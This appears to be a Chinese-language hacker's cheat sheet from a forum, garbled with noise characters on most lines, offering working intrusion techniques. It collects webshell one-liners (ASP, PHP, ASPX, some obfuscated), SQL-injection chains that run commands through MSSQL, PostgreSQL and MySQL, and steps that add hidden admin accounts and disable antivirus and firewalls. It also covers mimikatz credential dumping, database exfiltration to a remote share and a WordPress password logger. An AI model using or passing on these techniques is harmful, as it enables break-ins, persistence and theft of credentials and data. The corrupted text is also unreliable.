SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
4 U, g& Q6 a; _/ Faccess中导出shell
# c+ l" N. @, Z2 k9 Q9 j: T2 ^7 m$ H1 k8 R/ [- l! C6 l* [
中文版本操作系统中针对mysql添加用户完整代码:2 q, ^$ l/ k' x2 E% N$ }. X
2 y/ U" l* ^# ]& Y1 x' x Xuse test;: s) Y- Q# n5 ~. X% g+ j8 Y0 l# x
create table a (cmd text);
3 g- |0 d' H" V, q! m% [8 xinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
. S' U* N" U. v Uinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
" P/ X, O/ K! L6 |& W! tinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );) H" F" F8 t$ n* C. ?
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";2 u2 J# J- r9 z
drop table a;
: \2 [/ h. k E" ]# Q/ M4 p
0 b) ~! f# j. h5 v) O英文版本:0 Z' ` l) L7 Z' |) z' h( o7 x
( U( v2 e4 j$ y( Iuse test;
) [" O# N% j$ }$ u$ zcreate table a (cmd text);' M. e4 j& u' y% M
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
4 ~, W7 a& f* Z" p" @; ]insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );% i$ m& R5 E! m4 n$ L0 h) y
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );6 p: U1 V* w+ Q6 r1 v& Y: E
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
, B2 t% A' l7 Y% L7 X0 Edrop table a;
; X, P/ ^3 E; h- a
0 Y7 v$ d: t- l" U! ]create table a (cmd BLOB);6 k# v; j8 A/ p# b
insert into a values (CONVERT(木马的16进制代码,CHAR));. g- J; z1 @ b/ p' ]4 b+ T1 {
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe', j7 `) t1 S+ t( j: }
drop table a;
/ G4 ?; j, ^0 B: ], z
/ _( a. S0 b* l7 q记录一下怎么处理变态诺顿+ U/ o7 S% h) H( C
查看诺顿服务的路径: \5 A z7 S0 A- x) K* O1 g
sc qc ccSetMgr
5 ]4 U2 A; b) z然后设置权限拒绝访问。做绝一点。。* p! X/ G( h6 N x
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
0 v# s. d5 C" \0 O8 Ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"- H! T2 Z# r' ~3 r8 _; V
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators" x! z9 n$ Y* L# I" t! _
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone9 |& k& F+ a) N) A( r/ T
. \) N) z8 N0 U% M5 d" B: z+ D然后再重启服务器- M8 F0 o. m+ P2 ?2 s
iisreset /reboot& K8 o( b0 r7 Q7 @
这样就搞定了。。不过完事后。记得恢复权限。。。。( `1 N- R& X. y! a5 D, O
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
( c2 f3 d. c- T6 m" hcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F, I% b, j% J( b B7 V9 O+ e
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F* b% v- T6 J% P l9 m) B4 D7 F2 _' O
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F4 S* t H/ m: c- v! g
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin; l, G {: Z6 H1 u& {6 h( L
- U! u: w& O0 ?, bEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
* r" _' f$ ?. m4 P1 M% c
7 j1 [* `% f! k0 C( j7 X! `3 rpostgresql注射的一些东西* o) w7 N9 G- h/ K7 ~0 a) E
如何获得webshell; W" A( s: g1 _9 B/ [
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 8 B& ]5 C: O1 P+ Q1 S/ D
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); ' G2 J; u, f2 s! l
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;- B4 I5 P6 ]( P3 T5 f! Q
如何读文件
# @. ~% v2 Y7 X% y) w+ khttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
, C; p' ` ]. qhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;0 n! a. ?! @" J3 c* L, b1 e
http://127.0.0.1/postgresql.php?id=1;select * from myfile;7 z# [/ r% {- G3 i' k; S
* T/ U1 C+ ?4 p/ d1 e4 A, ?
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
4 ^0 i. N, b* Q$ C9 o7 M当然,这些的postgresql的数据库版本必须大于8.X
6 q( Z: z7 s0 `7 f. Q创建一个system的函数:
" Y# n' D0 ?3 F& f+ g: v, YCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
$ `; K _# B+ F% Y; z
. X" a4 f& G/ @# j( x创建一个输出表:
! h" R9 s3 r+ e3 U/ \CREATE TABLE stdout(id serial, system_out text)
4 n1 Y! ?6 i. q% s
& T g3 I, R2 W执行shell,输出到输出表内:) j% C o9 w4 m5 S( W! ]
SELECT system('uname -a > /tmp/test')
7 W F) Y# E3 `6 q3 @
9 D3 m% w% p2 s6 Hcopy 输出的内容到表里面;
2 {9 Y. y6 X3 r* h7 F. b- dCOPY stdout(system_out) FROM '/tmp/test'
! ?" Q! o. ~6 m/ S7 J) _" m
6 A% o$ q! W. [- n从输出表内读取执行后的回显,判断是否执行成功8 h+ E, |+ G4 C/ x6 d. s
0 c- x" w- a8 ^/ f7 l% GSELECT system_out FROM stdout; s3 F! ~- g4 D6 r; E) Y
下面是测试例子6 g7 ]$ G4 S/ p) i
+ x/ s; Q. w: B1 e: S, T/ C# L/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
# I. j0 c4 Q& S4 s
# H' I C- X1 @. m/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'+ s: R1 k* Q) n) ?- N& c8 v5 S* B
STRICT --
8 g" W- A1 ?8 Z; j' I4 Z) g' y6 r, V- k3 L6 c6 V4 x; \/ E5 v, T* V& I
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
* b) {' y+ M& [. @4 u
) R9 R6 f1 g" }/ ?/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --8 J4 r; j5 h8 ]& d; h+ x. W
. ~6 L9 x2 H0 y6 b
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--. ^5 ^4 {; M4 x5 G4 V
net stop sharedaccess stop the default firewall
0 S( u$ e- A% ]netsh firewall show show/config default firewall4 G# \; k: [9 N/ d8 W) `
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
/ `8 z& q- l# A! s; [: o/ O# u$ r8 Lnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall E8 ^* E) }9 |' B1 C+ v
修改3389端口方法(修改后不易被扫出)
: I0 p2 c6 Z! W' _9 o* ^修改服务器端的端口设置,注册表有2个地方需要修改
/ A9 d- q9 I, U; r- h, R6 P
! x# r% j& v# m% d. X[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]' V! b& E8 @3 B$ A! X: C0 y+ {8 \" o
PortNumber值,默认是3389,修改成所希望的端口,比如6000- D/ s# p. y- K* a; v1 f
+ M2 G$ `8 V- f
第二个地方:
7 x: u) M5 s. [" r8 D' o+ k0 p[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
6 n: v2 G1 n3 x) \PortNumber值,默认是3389,修改成所希望的端口,比如6000
7 c% Q5 X& {* O' a, _8 `9 |- N4 Z# i! \' Z: e, Z
现在这样就可以了。重启系统就可以了
2 q5 n4 W7 d& P5 O) f1 \3 }
' D% n1 t' P- d* J$ E查看3389远程登录的脚本
3 Q# T `+ S6 @* ?保存为一个bat文件" U6 c- r: @ Q* }" r; {# D
date /t >>D:\sec\TSlog\ts.log
2 _, c- e3 ^+ z# ~1 ltime /t >>D:\sec\TSlog\ts.log) O7 Y& A( A3 r
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
& U( Q9 q2 i8 H& dstart Explorer+ c7 s" q: n) P `" H( e$ X8 \
& c$ `0 p- h* ?, U5 `4 [6 omstsc的参数:
; x. P1 J9 |2 e8 y' a( B
" t4 J) x% @! f' I& _远程桌面连接
" _/ ^ N) g- i; ]" o- k
N' A2 M! ?2 V+ c0 I6 {MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]$ f7 |# O; S- L0 K/ n9 w
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
1 ?. }# B; ]5 l: t$ _0 R% g
8 A% Q/ x3 X( w: ~<Connection File> -- 指定连接的 .rdp 文件的名称。
' P5 f8 u* z7 f/ i4 H8 _3 X5 p7 m7 @3 x+ ~
/v:<server[:port]> -- 指定要连接到的终端服务器。
4 ~ c* \9 L- K# g6 T0 Q9 C/ ]/ b* `
/console -- 连接到服务器的控制台会话。
3 L3 L5 G) ~4 i# q
1 n1 Z' Z5 r+ W# m/f -- 以全屏模式启动客户端。
* z5 y1 ~& O. X8 a4 w4 f
# a0 z# R% J1 C" R, t8 _/w:<width> -- 指定远程桌面屏幕的宽度。2 m) {4 k) X! |) z# B
. Z, c8 X) B! S1 c/h:<height> -- 指定远程桌面屏幕的高度。5 T8 K+ v) _2 E1 I9 b! v
. J7 O/ u' f1 O7 c+ n/edit -- 打开指定的 .rdp 文件来编辑。. M. m) n4 T: U3 U& u: I
: `4 Y6 X: j/ a" R, o% Q/migrate -- 将客户端连接管理器创建的旧版5 f/ o. b. l2 k
连接文件迁移到新的 .rdp 连接文件。
1 n' N+ R& D0 e4 t" u d8 i+ k) s5 U7 w b
/ ^# {3 Z( u6 X; h, r- p9 S其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
, D9 S4 c% p9 t e1 ~2 B! Y2 J8 umstsc /console /v:124.42.126.xxx 突破终端访问限制数量: i& _6 |2 \$ @7 s6 c
* V" J4 O4 k: ~$ I命令行下开启3389
7 G8 A- z' `7 w) Z- i2 h8 s' Lnet user asp.net aspnet /add
5 ?) ]* g, B% G3 ~4 lnet localgroup Administrators asp.net /add8 k3 b; s, l3 Y* t& U' |
net localgroup "Remote Desktop Users" asp.net /add
$ E- |$ k1 O* L. Y3 |attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D' g5 `+ e& b1 [9 G) w+ I
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
8 x: ?' ] x9 p' x v- uecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1+ U+ u5 }, x: U
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f$ K, N/ | R9 D- |( F }
sc config rasman start= auto
: Z/ Q( X7 s- R$ ~; Z9 nsc config remoteaccess start= auto
1 C& X. ~7 d2 knet start rasman
" F, q+ ~( V8 z# m2 S. `net start remoteaccess! {4 ^/ e( N# F9 H
Media& f# d0 J+ P; o3 x0 I3 S4 }
<form id="frmUpload" enctype="multipart/form-data"
+ ^- a& a8 F9 G, U) Vaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
, n) W" `; |' ~) o% i4 D<input type="file" name="NewFile" size="50"><br>
* W) U7 t$ v. }& f<input id="btnUpload" type="submit" value="Upload">
5 o: I1 q: v; M. w</form>! d; W# k& H1 Y
' z/ b3 F# n3 i) p* N' c, j5 f
control userpasswords2 查看用户的密码
% s! G. q6 c4 y( t3 Faccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径% D8 [% ^# i+ N# \* n- t0 e3 P
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
' K0 ?* j$ U# }( T9 h- Q7 i
, E8 @9 w! g) l5 p141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:: o. B2 v% v1 X9 {" l; _1 \1 Q5 M$ U; z
测试1:
7 @* \9 T. h1 E1 d9 n% l) H3 kSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
# s2 F3 K" w' L0 Y* f, p& y
; L5 M$ z9 }$ G0 E测试2:
* z3 A0 K/ \8 W
& q4 X c* i8 _, @* y" Xcreate table dirs(paths varchar(100),paths1 varchar(100), id int)6 O! A4 n p* T8 l
; B! _; D$ N) U; f6 J
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--8 T. i) O. D9 l& G
" [$ _! u" B9 O! b; {4 M/ C6 G
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
) I* n6 f2 ~. w4 A9 l4 f3 [关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
2 L2 E9 @! U! q0 N7 I0 X- E3 y1 g可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
1 Z( W5 n/ \9 X: L$ mnet stop mcafeeframework* n$ l' N; K& _* _5 m
net stop mcshield/ m5 h/ v& F4 c
net stop mcafeeengineservice, e: [) R7 ]/ K9 t7 U1 j
net stop mctaskmanager: C5 c" n! [$ k
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
/ a1 ^: s" o# s% E" s: L6 O
. O5 j( @1 P+ |% ^* q VNCDump.zip (4.76 KB, 下载次数: 1)
6 A" c' n6 n1 [# A密码在线破解http://tools88.com/safe/vnc.php2 \5 |0 O( H& n1 A8 S! r
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
* Y: P2 x* G$ C
4 p: t( m Z& Vexec master..xp_cmdshell 'net user'
' n( ?0 M! D0 ~' Cmssql执行命令。7 X# B6 P/ e O! s- o. K2 ]: I5 y
获取mssql的密码hash查询: a. ~( z& M& }- ^8 O5 h R1 f' d* Y
select name,password from master.dbo.sysxlogins0 S+ k6 ^" I/ B9 b+ e& J# U
6 ?; s+ w% J0 k- N5 q
backup log dbName with NO_LOG;& @6 M' i j) o+ W6 _9 {
backup log dbName with TRUNCATE_ONLY;
' ]$ c% f- e! z4 d7 V/ q, UDBCC SHRINKDATABASE(dbName);
/ W) h# }4 D- H2 J1 X$ ?# ~mssql数据库压缩
& Y2 |3 d* d2 V5 M$ k' L8 {! ^7 W) P' t
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
# s/ A4 p1 X" Z将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。9 s! S- D/ s, k) z
% w2 g2 o" ~ W, x2 t9 B3 }: i
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
8 q3 ^9 j. K* n3 A备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak9 ]( c7 C: }: S
7 a# J. o N1 {Discuz!nt35渗透要点:
7 M6 L: ~' X7 i+ F2 U* p6 Y(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
+ K* {: \8 l+ b/ b0 p, G t& N' d(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>2 B) t' z0 A% B' _( k. _
(3)保存。4 I& M& S2 z1 P
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass* P, I2 Y9 N$ {$ e3 c
d:\rar.exe a -r d:\1.rar d:\website\5 Y' Y2 m: Y( V$ J* n% z. C
递归压缩website
* G2 n4 [' p- |+ L/ ?/ K7 x注意rar.exe的路径
: C% M( n, M5 ~! A/ I% d& F/ ?7 o+ z/ N! b5 B
<?php( w$ d9 j% G5 P$ R
) S& l) t5 M2 A$telok = "0${@eval($_POST[xxoo])}";) q( S% K, G2 {9 @
7 E, P4 L9 I1 }) G) d$username = "123456";" j- ?7 y/ G. D
9 o& j# Z/ J8 n
$userpwd = "123456";
8 k9 [" l2 C5 g" l3 I( ?! ^, M6 \% p6 \
$telhao = "123456";; k, \, N5 M7 ?1 W2 M* x( ~/ L
! M7 i) t0 t9 l$telinfo = "123456";
, ]6 _$ f9 E; N) l* ^6 e9 J5 f7 z- x- G; H6 B" Q
?>1 R5 |$ H0 [# B2 B% r" O
php一句话未过滤插入一句话木马# {. B+ j' N1 m$ s' T3 I4 d2 L$ ~
2 Q6 o; [0 j- \6 J' s q+ m* z3 F站库分离脱裤技巧
" H1 u! G/ [$ Z5 c$ a! w5 ~exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'1 O( x7 |5 Q! a8 A, H
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
# [' x4 F6 h0 ~; `* U条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
$ s& Q' D% S& T+ [这儿利用的是马儿的专家模式(自己写代码)。) c6 z* v K0 ]# N- ^& [
ini_set('display_errors', 1);3 _6 u3 l& u. o5 N& M3 b
set_time_limit(0);
" }, a, l+ @2 B$ @0 @: `$ W* Jerror_reporting(E_ALL);# L* F9 C6 J& O& p
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());$ z1 P8 F o' H: L* o
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
& b, J$ R: ^- _: Q1 S& }( Z. z$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());6 g- z+ \, h" q* m
$i = 0;3 Y+ s) ?2 O0 u7 g4 {& ^
$tmp = '';# t7 I0 t6 D) {
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
# q! D( i( O4 l2 m* r, `+ S- o $i = $i+1;8 G" O2 N* e: u F
$tmp .= implode("::", $row)."\n";, ~* ^8 E$ ^( V3 N3 `* }+ s5 _- \; Q$ X
if(!($i%500)){//500条写入一个文件
1 B, a' K+ r0 F# A& F $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
6 z/ G2 C& f0 d0 @" r- W file_put_contents($filename,$tmp);
: b( [3 ]1 Z( W, l $tmp = '';6 \" q* G* S4 }% c7 Y
}
. F# [4 O" d6 y}( ~0 }# T0 j5 G/ G- i( r% `
mysql_free_result($result);0 a) L8 v6 L7 @2 T& J0 e1 c
0 V+ z) X o2 k- s" s
9 y$ r7 B& W+ v
n" L8 {$ p. M3 i6 a7 r//down完后delete/ e. g" e# J8 {
m! d/ |2 ~: {& T/ ` p- E$ v2 }- X" g( k/ H# k
ini_set('display_errors', 1);+ L X; C/ Z+ ^5 c; u% s
error_reporting(E_ALL);+ l' S p, ^, K# a" z
$i = 0;3 F$ M7 r& B6 q q2 u
while($i<32) {4 K5 H. e: N) T4 N" M2 O* c
$i = $i+1;7 r4 a) q; `, x' [4 d. W$ H5 { `
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
P) [% C( \) }5 f8 k" t6 J' B unlink($filename);
X& S2 m9 Q, x$ A# F0 w g0 k}
, S0 n" O" I" Rhttprint 收集操作系统指纹# P6 J) J3 p) B0 S
扫描192.168.1.100的所有端口- R, H! P4 v5 |
nmap –PN –sT –sV –p0-65535 192.168.1.100
' P- P9 R2 `; B) s3 r) {+ ]host -t ns www.owasp.org 识别的名称服务器,获取dns信息
6 I; ^7 A! W# U' {' Lhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
p+ h) M. L+ x, v- |. L) \0 ANetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host. w2 N8 t- ]- f1 F1 S
9 A; V7 d \2 N. K1 ]% y% U; o( HDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册); B" c- B y. H7 j3 C+ x
$ n" \4 {3 ]% U2 @ MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
" `& S0 h1 m4 f& R+ e* l1 I. I# A6 h8 W& `3 H
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x( @ U# @" n) `% N& | \1 G: s
' X% V5 _, M% k% t$ Q& V5 ^* h DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)# v/ n+ U- y9 E/ T! C
% l) ~% g6 {3 @% w( g. l0 I
http://net-square.com/msnpawn/index.shtml (要求安装)6 A+ H D! P$ I: e
4 u/ w$ P* D+ u% C' u
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
+ G: R' U- A" `2 a" S! O
' C0 r6 f3 P0 k& A/ S! l! ^% C SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)7 Q, W' j* \$ V* G
set names gb2312
# b( b1 v" w9 ~2 P导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。1 t9 W7 ^7 v( R
* a4 ^3 T1 U4 Z+ I* g6 V, s" wmysql 密码修改9 N* `, g5 d2 k2 R
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” , o, H) K! K9 m' q
update user set password=PASSWORD('antian365.com') where user='root';
/ d4 b& q- I8 m" \- p2 Bflush privileges;0 e4 B% s+ @$ Y: A
高级的PHP一句话木马后门% |) C8 {6 e4 X& t
- a. s2 t( X: g, S8 t$ S4 P
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀8 Q7 q0 ~. M' Z; B$ `
. ?- x) W1 d6 t2 S5 c; H+ l1、
- I6 P# ]4 E ?! l& r% Z( m, E8 @2 C9 y% W' \& f, i4 }8 i
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
* r9 M' c q7 Y
) j3 L& I, b# u0 f* b1 L$ u6 a$hh("/[discuz]/e",$_POST['h'],"Access");0 j& [6 I; @+ W
% ^7 L% _ e2 b1 d//菜刀一句话
7 v5 d6 u% A/ g# I# J4 g @: a8 M8 o# o* @& v
2、
8 Y. Z3 k! \3 |: N' y) x+ H1 p5 o1 M5 \" u! y3 p3 j9 \
$filename=$_GET['xbid'];
- ]# g& Q u' n! y4 C2 a1 Y0 V7 E& K1 L+ f0 e
include ($filename); G2 Z* r" f/ _7 H
5 d& o# r) ^2 y6 B$ b: L. U/ S/ [# \//危险的include函数,直接编译任何文件为php格式运行8 E8 a$ z3 O+ O
3 z8 S. O4 E M1 e, B" x
3、
$ D/ f' H" `$ K5 g3 v2 K
/ x( l' }6 d2 c% ~+ Q3 @. b, a$reg="c"."o"."p"."y";
5 F' }: f7 t8 u" g6 }5 E4 {4 t9 h8 D4 {
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);* \' X7 {& e& H' m/ v; n
2 _# C2 ]) C& T+ b//重命名任何文件! w) {, f1 ?* M
! ]" } O4 V6 L+ o m+ F& \
4、
9 ^; B4 U. a2 h: P$ J m* R" z7 z" L; Z
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
i+ f/ C7 e- h: u( H ?
" k; p4 G5 U; H/ b4 S$gzid("/[discuz]/e",$_POST['h'],"Access");
. p0 T1 |: L+ R6 V5 P' b2 V2 w0 m. B! _8 d% J. m3 R
//菜刀一句话- s6 Z- ?) U& W: H: l4 @6 [
; U/ A- O/ ~0 c5 K5、include ($uid);
7 K& s/ g# U! o! _ \. J: f ?; H" j4 U1 T
//危险的include函数,直接编译任何文件为php格式运行,POST 7 `3 _; W3 M5 @
9 H8 _5 V5 Y* g9 |3 r% t$ N1 ]) f
" z3 ]& Q7 f; K6 |/ h//gif插一句话
# C+ \! V& B1 V2 f7 ^" T1 ~0 c6 Z: P; h- e% y: U
6、典型一句话
4 e% K: Y$ d2 p% r0 F. b1 Y g1 g, l0 y7 \! F
程序后门代码) H) ?. I4 u' R& K+ l6 v; n8 _' d' D
<?php eval_r($_POST[sb])?>
: _# Z' u) L0 e1 W: I3 s程序代码' p( S# Y6 @6 s. D6 x& L
<?php @eval_r($_POST[sb])?>7 Q2 s8 M! X0 Z8 j, z$ B
//容错代码+ U t* ?( X( b0 s
程序代码3 l7 j, E. Y' ^- y
<?php assert($_POST[sb]);?>' g. h" a1 O4 a; W7 u; X' t
//使用lanker一句话客户端的专家模式执行相关的php语句% e J( ^# _. J [
程序代码
! R& O: Y3 c* B! f$ R<?$_POST['sa']($_POST['sb']);?>
/ y: o: `. w9 m' X程序代码/ f. F% c1 N7 {, m7 s0 l, m
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
; H' U2 k, N. B! ]; i程序代码) ^6 ?! M- N. V8 W
<?php$ B; L/ p) J2 B; Q8 ^6 T+ x0 t( N5 |
@preg_replace("/[email]/e",$_POST['h'],"error");
1 ^3 }- b% s `' e" H?>
4 S4 a$ [! R# R s* ?$ X4 h% w//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入0 Z# P, y' P1 M3 K e. H2 f" ^
程序代码$ M2 |% m. U; G% ^. G
<O>h=@eval_r($_POST[c]);</O>; ~4 N- R3 S8 k) Y+ @% i
程序代码
$ b. y7 O4 ~! K/ B9 l<script language="php">@eval_r($_POST[sb])</script>
2 ^0 V! T5 L0 N# X; o* }//绕过<?限制的一句话
h H& z+ a- q( n
3 \# N5 r/ J! J; [3 Q4 Whttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip* A" l. b9 ^ f& j3 Q! r
详细用法:7 x) d7 h8 \; K
1、到tools目录。psexec \\127.0.0.1 cmd$ c8 J4 i6 v, q7 v( Y! |) D1 G
2、执行mimikatz
5 F' H* {$ A3 S& u3 [1 O3、执行 privilege::debug9 }) j( B+ }# J2 Q
4、执行 inject::process lsass.exe sekurlsa.dll( Y. Q t; ]" n. D: D
5、执行@getLogonPasswords
+ G% C3 j8 K ~& h& s; Z$ }' J8 u6、widget就是密码
E3 N5 b) U9 n* [- G4 T1 ?9 q5 _7、exit退出,不要直接关闭否则系统会崩溃。8 W- N/ t4 n' q* G
9 H8 M: v `8 n: f- k
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面+ d+ p4 b/ R+ z5 H) f; i* H8 g
; \# Y" n- D; O* f
自动查找系统高危补丁
7 D# ?6 w- H% I C1 j* l6 osysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt1 h$ W) v2 |2 Q6 S
9 F8 S/ ]" s% f [, [5 Q
突破安全狗的一句话aspx后门* G/ l4 Q: y: t; u; T
<%@ Page Language="C#" ValidateRequest="false" %># S4 \: F% J0 g" U/ s; r3 p3 _
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
6 m/ ~( H7 J3 T- z- uwebshell下记录WordPress登陆密码
3 Z/ U% L) z% T" e+ uwebshell下记录Wordpress登陆密码方便进一步社工
, ^5 t( a% @% v在文件wp-login.php中539行处添加:7 k. ]6 M d- G* s8 J
// log password
9 u- d* t3 q* F% i" I( x$log_user=$_POST['log'];
* x+ I; @) X; B+ w$ Y: \! M$log_pwd=$_POST['pwd'];
: i, l- J7 n0 o: l$log_ip=$_SERVER["REMOTE_ADDR"];
- ]: I V6 b% N2 G$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
1 @0 ]# z3 C8 v1 V" @: u$txt=$txt.”\r\n”;- o8 [( Y: N& B H! {
if($log_user&&$log_pwd&&$log_ip){- a1 X& {2 g/ S; m0 I* e" T
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);- u, A3 P6 s" V, @7 B
}
" ]: M2 W1 m, [' t当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。" E7 }4 T* k6 R3 F
就是搜索case ‘login’6 @7 x1 ^; P: ]& Q+ e- F
在它下面直接插入即可,记录的密码生成在pwd.txt中,
! |1 R' f! W$ x2 [# f% U3 r其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录! [4 [2 n( o6 G6 C
利用II6文件解析漏洞绕过安全狗代码:+ G) Y1 \7 _7 j. z0 t
